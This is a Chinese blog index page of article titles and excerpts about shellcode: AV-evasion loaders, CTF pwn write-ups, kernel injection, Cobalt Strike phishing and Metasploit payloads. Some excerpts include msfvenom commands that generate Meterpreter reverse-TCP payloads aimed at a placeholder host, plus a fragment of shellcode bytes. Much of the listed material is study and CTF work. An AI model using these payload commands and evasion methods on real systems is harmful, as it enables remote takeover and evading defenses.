Shellcode

第108天:免杀对抗-Python&混淆算法&反序列化&打包生成器&Py2exe&Nuitka

知识点#知识点:1、Python-对执行代码做文章2、Python-对shellcode做文章3、Python-对代码打包器做文章#章节点:编译代码面-ShellCode-混淆编译代码面-编辑执行器-编写编译代码面
Ch4ser·2023-07-22 01:50

红队打靶:Brainpan打靶思路详解(vulnhub)

目录写在开头第一步:主机发现和端口扫描第二步:web渗透第三步:缓冲区溢出漏洞识别第四步:定位eip寄存器(确定溢出字符串的长度)第五步:ESP扩容(判断ESP寄存器的大小是否够装shellcode)第六步
Bossfrank·2023-07-18 09:56

深入理解Shellcode混淆加密技术

前言一、Shellcode简介二、Shellcode混淆技术三、常见的Shellcode加密技术四、Shellcode解密和执行<
0xThrL·2023-07-17 21:30

Shellcode免杀技术的探索与应对策略

最近在学免杀的顺道了解一些知识文章目录前言一、Shellcode免杀技术的原理二、常见的Shellcode免杀策略三、应对策略
0xThrL·2023-07-17 21:29

Havoc!新的开源命令和控制C2框架

公众号,回复关键字【230618】获取下载链接Havoc包含各种各样的模块,允许渗透测试人员(和黑客)在被利用的设备上执行各种任务,包括执行命令、管理进程、下载额外的有效负载、操作Windows令牌和执行shellcode
潇湘信安·2023-07-17 09:59

4.9 x64dbg 内存处理与差异对比

LyScript插件中针对内存读写函数的封装功能并不多,只提供了最基本的内存读取和内存写入系列函数的封装,本章将继续对API接口进行封装,实现一些在软件逆向分析中非常实用的功能,例如ShellCode代码写出与置入
微软安全技术分享·2023-07-16 15:09

渗透测试常用术语总结

1.POC、EXP、Payload与ShellcodePOC:全称'ProofofConcept',中文'概念验证',常指一段漏洞证明的代码。
L世界凌乱了·2023-07-13 16:43

CTFshow-pwn入门-前置基础pwn23-pwn25

pwn23-25的题目会涉及到ret2shellcode、ret2libc等内容,本篇文章只会侧重研究这几道题目的wp,不会过多涉及到ret2shellcode、ret2libc的基本原理,等有时间再来写关于
T1ngSh0w·2023-06-21 10:51

CTFshow-pwn入门-前置基础pwn26-pwn28

什么是ASLR大多数的攻击都基于这样一个前提,即攻击者知道程序的内存布局,需要提前知道shellcode或者其他一些数据的位置。
T1ngSh0w·2023-06-21 10:18

pwn — ret2syscall

ret2syscall再来check一下保护,发现开了NX这次我先看一下应该填充的字符串长度为多少,爆出来发现是112然后在Ida里看main发现这是个nosystem又noshellcode的题,然后又开了
YeeZi_·2023-06-21 05:51

0002-TIPS-2020-hxp-kernel-rop : bypass-smep-with-rop

在没有开启SMEP的情况下,攻击者将rip或者函数指针指向了用户空间,可在用户空间布局shellcode,从而提权。
goodcat666·2023-06-18 23:04

内核线程注入(x64)

经过自己修改后做成的Demo,功能主要通过Ring0层驱动Attach到目标进程(目标进程可以是32位进程也可以是64位进程,使用不同的ShellCode进行注入操作),然后调用NtCreateThreadEx
拉塞尔·2023-06-18 00:46

驱动开发:内核ShellCode线程注入

《驱动开发:内核LoadLibrary实现DLL注入》中所使用的注入技术吗,我们通过RtlCreateUserThread函数调用实现了注入DLL到应用层并执行,本章将继续探索一个简单的问题,如何注入ShellCode
王 瑞·2023-06-18 00:13

总结加载Shellcode的各种方式(更新中!)

1.内联汇编加载使用内联汇编只能加载32位程序的ShellCode,因为64位程序不支持写内联汇编#pragmacomment(linker,"/section:.data,RWE")//将data段的内存设置成可读可写可执行
Henry404s·2023-06-17 07:26

驱动开发:内核ShellCode线程注入

驱动开发:内核LoadLibrary实现DLL注入》`中所使用的注入技术吗,我们通过`RtlCreateUserThread`函数调用实现了注入DLL到应用层并执行,本章将继续探索一个简单的问题,如何注入`ShellCode
lyshark·2023-06-14 09:00

【pwn-栈溢出】— ret2shellcode

目录ret2shellcode0x1、程序信息0x2、检查保护0x3、寻找溢出点0x4、计算溢出偏移0x5、验证bss段可执行0x6、编写exp脚本ret2shellcode0x1、程序信息描述内容程序名称
小朋友呢·2023-06-09 05:50

CTF-PWN笔记(一)-- 栈溢出 之 基础ROP

文章目录栈linux内存布局原理文件保护机制CanaryNX(DEP)PIE(ASLR)RELROROPret2txtret2shellcoderet2syscallret2libc栈栈是一种典型的后进先出
Chiaki_0ff·2023-06-09 05:47

pwn基础之ctfwiki-栈溢出-基础ROP-ret2shellcode

文章目录前言原理ret2shellcode挖掘漏洞利用漏洞利用脚本(exp)总结前言二进制小白的学习记录,是自己写的第二篇文章,相较于第一篇文章我也做了一些改进,希望会越来越好。
大能猫能·2023-06-09 05:17

pwn(2)-栈溢出下

32位shellcode编写不同内核态操作通过给寄存器设置不同的值,在调用指令int80h,就可以通知内核完成不同的功能。
NEFU-XingKong·2023-06-09 05:45

Python-shellcode免杀分离

#Python-原生态-MSF&CS&生成&执行代码MSF-payload:msfvenom-pwindows/meterpreter/reverse_tcplhost=X.X.X.Xlport=6688-fcCS-payload:攻击--生成后门--payload生成器--选择监听器和输出格式为C语言python3.10-32位,注意python解释器一定要切换为32位importctypess
大飞先生·2023-06-08 12:53

Metasploit payloads模块理解

文章目录一、payloads的使用二、payload是什么payloadshellcode的编写三、MSF的Payloads模块payload分类payload的投递四、MSF模块功能参考一、payloads
藤原千花的败北·2023-04-20 21:43

2023 广东海洋大学 GDOUCTF Writeup By AheadSec

PwnEASYPWNezshellcode真男人下120层RANDOMCryptoAbsolute_Baby_Encrytpion
末初mochu7·2023-04-20 13:03

BUUCTF-PWN-[第五空间2019 决赛]PWN5

这题考到格式化字符串的方法我之前没有学过根据wp写完这题去看看原理下载打开环境checksec看看发现有三个保护nx打开所以无法写入shellcode现在看看ida32发现/bin/sh进去看发现就在主函数里面我们进行代码审计发现输入名字他会返回名字然后再输入密码如果密码和
双层小牛堡·2023-04-20 10:17

SROP学习 smallest & ciscn_s_3

SigreturnOrientedProgramming)于2014年被VrijeUniversiteitAmsterdam的ErikBosman提出,其相关研究FramingSignals—AReturntoPortableShellcode
Red-Leaves·2023-04-18 05:34

PWN-ret2shellcode原理

我们之前做过很简单的pwn题目buuctf-rip这种是在程序中存在shellcode直接返回地址改为这个shellcode的地址即可但是如果程序里面没有呢这种类型就是ret2shellcode常见的shellcodeshellcode
双层小牛堡·2023-04-17 18:09

CTFHUB-PWN-ret2shellcode

PWN常用命令_猫疼玩AI的博客-CSDN博客几个大方向的思路:没有PIE:ret2libcNX关闭:ret2shellcode其他思路:ret2csu、ret2text【程序本身有shellcode
双层小牛堡·2023-04-17 18:09

漏洞中的一些名词

shellcodeexploit解释:-shellcode:通称缓冲区溢出攻击中植入进程的代码,这段代码可以是出于恶作剧的目的弹出一个消息框,也可以是出于攻击目的的删改重要文件、窃取数据、上传木马病毒并运行等
1Oin0·2023-04-17 15:25

[样本分析初体验] Parite家族感染型病毒

文章目录样本信息样本行为详细分析病毒主体解密ShellCodeShellCode主体病毒DLL脱壳DllEntryPoint感染过程总结分析样本信息MD5:b4964c8ac85b1e428c9eefe572237b21
哎呀呀呀浅汐·2023-04-17 09:04

ctf-wiki ret2syscall

总觉得自己没有一个完整的知识体系栈溢出时候,可以考虑系统调用的用法这个学期学了操作系统,对于系统调用认知又上了一步用户态和内核态的区别用户态的进程execve族函数,int80h的中断号三个参数(binsh,0,0)写shellcode
poxlove3·2023-04-15 17:20

TryHackMe-红队-20_Anti-Virus规避:Shellcode

Anti-VirusEvasion:Shellcode学习shellcode编码、打包、活页夹和加密器。在这个房间里,我们将探讨如何构建和交付有效载荷,重点是避免被常见的AV引擎检测到。
Sugobet·2023-04-10 09:38

day110 自动化部署的shell脚本

code里面执行下面命令#[email protected]:/demo.gitCDATE=$(date"+%Y-%m-%d")CTIME=$(date"+%Y-%m-%d-%H-%M")#SHELLCODE
5不忘初心0·2023-04-08 20:12

远控免杀学习笔记-msfvenom工具介绍(二)

⽌假session防⽌session意外退出handler后台持续监听payload的可持续化各平台payload⽣成⼆进制windowsLinuxMacAndroidPowershellNetcatShellcode
仲瑿·2023-04-06 15:59

在win7 x64下做个简单的内核绘制

基本流程如下:1.在内核中hook相关shadowSSDT或SSDT函数;2.在目标进程申请内存,写入用于D3D9绘制的shellcode;3.利用APC的力量回到用户模式,执行用于D3D9绘制的shellcode
看雪学院·2023-04-03 22:21

关于dll注入方式的学习(全局钩子注入)

然而实际上,我们可以以其他的多种形式注入代码(正如恶意软件中所常见的,任意PE文件,shellcode代码/程序集等)。全局钩子注入在Windows大部分应用都是基于
网络安全你我他·2023-04-03 13:25

Windows 10 内核漏洞利用防护及其绕过方法

Windows101607和1703版本中引⼊的针对内核漏洞利⽤的防护措施,在此基础上将给出相应的绕过⽅案,从⽽使我们能够重新获得内核态下的RWprimitives,并进⼀步实现KASLR绕过以及内核中shellcode
看雪学院·2023-04-02 00:20

2022第六届蓝帽杯初赛writeup

2022第六届蓝帽杯初赛writeupPWNEscapeShellcodeMISCdomainhackerdomainhacker2电子取证手机取证_1手机取证_2计算机取证_1计算机取证_2计算机取证
小蓝同学`·2023-04-01 15:23

CobaltStrike之宏钓鱼及shellcode 实验详细

文章目录预备知识实验目的实验地址实验环境实验步骤一启动cs服务器客户端连入服务器生成office宏病毒利用宏病毒上线CS生成宏文件利用成功实验步骤二实验步骤三预备知识CobaltStrike是一款渗透测试神器,常被业界人称为CS神器。CobaltStrike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。CobaltStr
渗透测试小白·2023-04-01 13:12

Armv8-A架构安全特性总结

一般用于配置数据段不可执行,防止数据段注入可执行的shellcode
magicse7en·2023-04-01 09:25

【免杀前置课——shellcode】二十一、shellcode初步优化——通过跳板指令定位shellcode,解决程序随机基址无法跳转shellcode问题(详解)

shellcode初步优化通过跳板指令定位shellcode极其简化版shellcode_存在问题:```解析(重要)```第一个问题程序随机基址无法确定跳转shellcode位置第二个问题程序未正常退出通过跳板指令定位
webfker from 0 to 1·2023-03-31 03:15

MSF实战免杀过静态:ShellCode加花指令

分析MSF的ShellCode1.Hash寻找系统API函数由于ShellCode是没有PE结构的,无法通过导入表来调用系统的API函数,因此,这部分是一个通用的API调用函数,它可以根据给定的哈希值查找并调用相应的
Henry404s·2023-03-31 03:22

PowerShell攻击指南

文章目录一:PowerShell简介1.1:基本概念1.2:执行策略与绕过1.3:常用命令二:PowerSploit2.1:PowerSploit安装2.2:PowerSploit攻击实战2.2.1:直接shellcode
入狱计划进度50%·2023-03-30 06:31

网络安全&系统&操作&名词

蓝易云高性能服务器点击抢购吧点击抢购吧点击抢购吧点击抢购吧网络安全&系统&操作&名词常见名词前后端,POC/EXP,Payload/Shellcode,后门/Webshell,木马/病毒,反弹,回显,跳板
无聊的知识·2023-03-29 08:35

结合veillCS shellcode免杀(2020.1.13已过期)

一、CS生成shellcode攻击-生成后门-payloadgenerator-选veil二、安装veil安装dockerpullmattiasohlsson/veil启动dockerrun-it-v/
q1ya·2023-03-26 09:26

用ASM编写一个简单的Windows Shellcode思路总结

shellcode是什么?“代码也好数据也好只要是与位置无关的二进制就都是shellcode。”
H_00c8·2023-03-17 08:17

免杀工具shellcodeloader

工具地址:shellcodeloader不想自己编译,就用工具作者自己编译的成品,realseMSF生成bin文件:msfvenom-pwindows/x64/meterpreter_reverse_tcpLHOST
LMcream·2023-03-17 05:19

萌新逆向学习笔记——CreateRemoteThread的Shellcode

前言笔者已经有一段时间没发文了,说实话最近学习逆向没劲儿,不知道是不是因为天气总是变化无常,人感觉有点疲惫。友情提示:下面一堆笔者废话,所以只想看技术细节可跳过。之前一直在看韩国人写的《逆向工程核心原理》,但总感觉缺了点什么,于是乎买了本《加密与解密》。总体上来说看到现在给我的感觉就是,很难,似乎较为注重理论知识。与《逆向工程核心原理》一章好几个实践不同,《加密与解密》前面用了大部分章节去介绍诸如
全汪汪·2023-03-10 03:03

PWN栈溢出基础——ROP1.0

PWN栈溢出基础——ROP1.0这篇文章介绍ret2text,ret2shellcode,ret2syscall(基础篇)在中间会尽量准确地阐述漏洞利用和exp的原理,并且尽量细致地将每一步操作写出来。
杰森任·2023-02-17 04:47

pwnable.kr之fix

#include//23byteshellcodefromhttp://shell-storm.org/shellcode/files/shellcode-827.phpcharsc[]="\x31\xc0
hyrathon·2023-02-07 00:01

32c3 sandbox

Tags:/proc/self/mem,seccomp,shellcode前言做seccomp相关题目遇到的一个题目,利用方式很有意思,第一次见:通过修改/proc/self/mem可以修改不可写的代码段
pu1p·2023-02-04 11:42

恶意软件相关

恶意软件集合匿名代理蜜罐恶意软件样本库开源威胁情报工具其他资源检测与分类在线扫描与沙盒域名分析浏览器恶意软件文档和Shellcode文件提取去混淆调试与逆向工程网络内存取证Windows神器存储和工作流杂项资源书籍
bqbcw·2023-02-03 12:10
上一页 1 2 3 4 5 6 7 8 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他